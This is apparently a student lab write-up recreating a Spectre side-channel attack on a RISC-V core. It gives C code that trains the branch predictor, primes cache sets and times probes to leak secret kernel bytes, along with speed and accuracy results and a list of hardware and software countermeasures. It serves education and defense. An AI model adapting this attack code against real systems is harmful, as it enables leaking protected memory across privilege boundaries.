CS152 Lab 3 Open Section

# CS152 Lab 3 Open Section Richard Yan, Edison Wang *4.2 Recreating Spectre Attacks* ### Code ```c #include <stddef.h> #include <unistd.h> #include <stdio.h> static inline void leak(size_t index, int shift) {/* skipped */} static inline unsigned long get_cycles(void) {/* skipped */} static inline void printx(unsigned char x) {/* skipped */} uint8_t *flusher; // mem addr: [tag] [set (6)] [byte offset (6)] // leak_array[0] is set 000100 = 4 // leak_array[64] is set 5 #define SET0 4 #define SET1 5 static void read_memory_byte(size_t malicious_x) { uint8_t result = 0; for (uint8_t b = 0; b < 8; b++) { long bit_scores[2] = {0, 0}; unsigned long bit_results[2] = {0, 0}; #pragma GCC unroll 21 for (uint8_t tries = 0; tries < 21; tries++) { // register unsigned long c_sum; register unsigned long c; register unsigned long c_sum = 0; register unsigned long c_sum2 = 0; // TRAIN leak(0, 0); leak(0, 0); leak(0, 0); leak(0, 0); leak(0, 0); leak(0, 0); leak(0, 0); leak(0, 0); // PRIME volatile register uint8_t probe; probe = flusher[0 * 4096 + SET0 * 64]; probe = flusher[0 * 4096 + SET1 * 64]; probe = flusher[1 * 4096 + SET0 * 64]; probe = flusher[1 * 4096 + SET1 * 64]; probe = flusher[2 * 4096 + SET0 * 64]; probe = flusher[2 * 4096 + SET1 * 64]; probe = flusher[3 * 4096 + SET0 * 64]; probe = flusher[3 * 4096 + SET1 * 64]; // EXPLOIT leak(malicious_x, b); // PROBE // we want to check all 4 ways // set 5 first register uint8_t *addr = &flusher[SET1 * 64]; c = get_cycles(); probe = *addr; c_sum2 += get_cycles() - c; addr += 4096; c = get_cycles(); probe = *addr; c_sum2 += get_cycles() - c; addr += 4096; c = get_cycles(); probe = *addr; c_sum2 += get_cycles() - c; addr += 4096; c = get_cycles(); probe = *addr; c_sum2 += get_cycles() - c; addr -= 12352; // now set 4 c = get_cycles(); probe = *addr; c_sum += get_cycles() - c; addr += 4096; c = get_cycles(); probe = *addr; c_sum += get_cycles() - c; addr += 4096; c = get_cycles(); probe = *addr; c_sum += get_cycles() - c; addr += 4096; c = get_cycles(); probe = *addr; c_sum += get_cycles() - c; unsigned long sgn = (c_sum - c_sum2) >> 63; bit_results[0] += 1 - sgn; bit_results[1] += sgn; if (bit_results[0] >= 11) break; if (bit_results[1] >= 11) break; } // tries if (bit_results[1] > bit_results[0]) { // 1 evicted result |= (1 << b); } } printx(result); } int main(void) { uint8_t flusher_region[512 * 64]; // 256 cache lines, 64 bytes each // align flusher to dcache boundary flusher = (uint8_t *) (((size_t) &flusher_region[0] + 255 * 64) / (256 * 64) * (256 * 64)); size_t leak_addr = 0x80015100L; size_t secret_addr = 0x8000b000L; for (int i = 0x00; i < 0x80; i++) { read_memory_byte(secret_addr - leak_addr + i); } return 0; } ``` Shown above is the 21 tries/bit variant. #### The setup process: - We first allocate a known memory region with 4 times the size of the L1 D cache, also aligned to the start of the cache (so that the last 12 bits of the 0th element's address are all zeros). - We determine the address of `leak_array` and the address of `secret`. From disassembly, `leak_array[0]` has cache index `0b000100 = 4`, `leak_array[64]` has cache index `0b000101 = 5`. We therefore know the sets the cache covert channel communicates through. - For each secret byte, we determine the malicous `x` value by calculating the address difference between the target byte and the leak array address. - We know that the first memory access in `sys_leak` (`leak_array[x]`) will not interfere with our probing. This is because: - During training, `x` is always fed as 0. This access maps to set 0 and does not interfere with sets 4 and 5, where we are probing. - During the exploit, `leak_array[x]` points to somewhere in the secret data range. We already know `.data.secret` starts at `0x8000b000` and ends at `0x8000b080`. The span is 2 cache lines mapping to set 0 and set 1, and therefore also does not interfere with our probing. #### The probe process: - For each byte, we go over each of its 8 bits in order. - For each bit, we try 21 times (or any odd number of times) to guess its value. - TRAIN: We first train the branch predictor in `sys_leak` by calling with correct arguments 8 times. - PRIME: for sets 4 and 5 we map all 4 ways to regions in the `flusher`, in 4KB intervals. This is deliberately not in a loop so as to not affect the branch predictor with loop condition branches. - EXPLOIT: we call with malicious x value and the current bit shift. During speculative execution, either `leak_array[0]` or `leak_array[64]` gets accessed, the former evicting a way in set 4, the latter set 5. - PROBE: we time memory access time for all 4 ways for set 5, then set 4. Address calculation done before recording the cycle count, the only operation timed is a pointer dereference. - Access times for all 4 ways are summed for each set then compared. The higher set gets a point. - Early termination is performed if we have high enough scores for a particular value. - At the end, the value with the highest score wins. If the bit is determined to be a 1, the `result` byte has that bit flipped. After all 8 bits, the `result` byte holds the best guess and is outputted. #### Room for improvements: - Earlier termination: - If say the first 5 tries are all for one value, we might be confident enough already and need not get to majority. This saves cycles with little cost in accuracy. - Less `sys_leak` calls during training: - Self explanatory - might not need 8 training calls. - Could adapt for non-hardcoded memory locations. ### Difficulties - Cache ways - Originally did not notice we had 4 ways per set. Primed all sets with only 1 way didn't work. Checked the config to verify we have 64 sets with 4 ways. - Set specific flush - The code flushed the entire cache every time for the PRIME step originally, which took forever. Since we are only operating on sets 4 and 5, changing the flush code to flush only these 2 sets led to a much faster runtime. - Eviction detection - When results were wrong, we weren't sure if eviction detection is failing, or if the exploit/training failed. To test this, the test is copied to baremetal, syscalls removed, and the exploit call replaced with a memory access to some other array that maps to `leak_array[0]` or `leak_array[64]`. Checking if the results were in line with that access helped rule out eviction detection as a point of failure. - Fence - We thought that the `fence` instruction was a good idea to count cycles with less external influences. It wasn't. - Comparing cycle counts - Originally, cycle counts were summed for all tries before they are compared. This was bad in two ways: 1. sometimes an outlier can drastically skew the sums and 2. does not easily allow early termination. Switching to a score-based system alleviated the 2 problems. - Memory access pattern - We originally probed set 4 first, then set 5. It looked like cycle counts were always less for set 5 when nothing is evicted, so we interleaved 4 and 5 with 4 first. The bias persisted. Our guess is that there exists a next cache line prefetching mechanism. The [SonicBOOM](https://carrv.github.io/2020/papers/CARRV2020_paper_15_Zhao.pdf) paper section 8.2 also mentioned a small L1 cache next-line prefetcher. As a result, all set 5 probes are done first. - Unrolling - We unrolled most loops fearing that the branch instruction might interfere with the probe. Did it help? Probably not. But there's no harm in doing that. ### Speed 13 tries/bit: **64329510** cycles for all 128 bytes = **502574** cycles/byte 21 tries/bit: **95923915** cycles for all 128 bytes = **749406** cycles/byte 29 tries/bit: **132128932** cycles for all 128 bytes = **1032257** cycles/byte Under 1 GHz & 21 tries/bit, we are looking at just under 1 second for 128 bytes. ### Accuracy #### Byte accuracy 13 tries/bit: 41 byte errors = 67.97% accuracy 21 tries/bit: 6 byte errors = 95.31% accuracy 29 tries/bit: 4 byte errors = 96.88% accuracy #### Bit accuracy 13 tries/bit: 45 bit errors = 95.6% accuracy 21 tries/bit: 6 bit errors = 99.4% accuracy 29 tries/bit: 4 bit errors = 99.6% accuracy ### Countermeasures #### Hardware - Disable speculation under s-mode or m-mode, or add a privileged instruction to toggle speculation. - Easy to add a switch - Hurts kernel performance - Use a victim-cache-like data structure to hold evicted lines during speculation, and restore them on branch mispredict. Cache lines will need to carry a branch tag to determine which branch they were speculatively loaded under. - Very difficult to implement, uses more hardware - Less performance hit - Add enough jitter to user-mode hardware performance counters. - Might have proper usages and affect existing applications - Easy to implement and might be helpful in mitigating other timing attacks - Kernel-specific cache. - More hardware, need additional cache coherency - Relatively easy to implement #### Software - Hint the compiler for all kernel/security-critical conditions (especially boundary checking) always predict "not taken". This eliminates speculation. - Hardware might not support taking branch hints - Need to manually go through every branch, potentially a large job - Little complications aside from performance - Recompile the kernel with no speculative execution. - Hardware might not support speculation toggle - Hurts kernel performance - Easy to do - Explicit pointer sanitization: e.g. for this case, first do `x = x & 0xfff` before indexing into the array. - Does not cover all cases (though branch predicates might help) - Requires manual review for each case - For cases that does apply, there is little to no performance penalty

Syntax	Example	Reference
# Header	Header	基本排版
- Unordered List	Unordered List
1. Ordered List	Ordered List
- [ ] Todo List	Todo List
> Blockquote	Blockquote
Bold font	Bold font
Italics font	Italics font
~~Strikethrough~~	~~Strikethrough~~
19^th^	19^th
H~2~O	H₂O
++Inserted text++	Inserted text
==Marked text==	Marked text
[link text](https:// "title")	Link
![image alt](https:// "title")	Image
`Code`	`Code`	在筆記中貼入程式碼
```javascript var i = 0; ```	`var i = 0;`
:smile:		Emoji list
{%youtube youtube_id %}	Externals
$L^aT_eX$	L^aT_eX
:::info This is a alert area. :::	This is a alert area.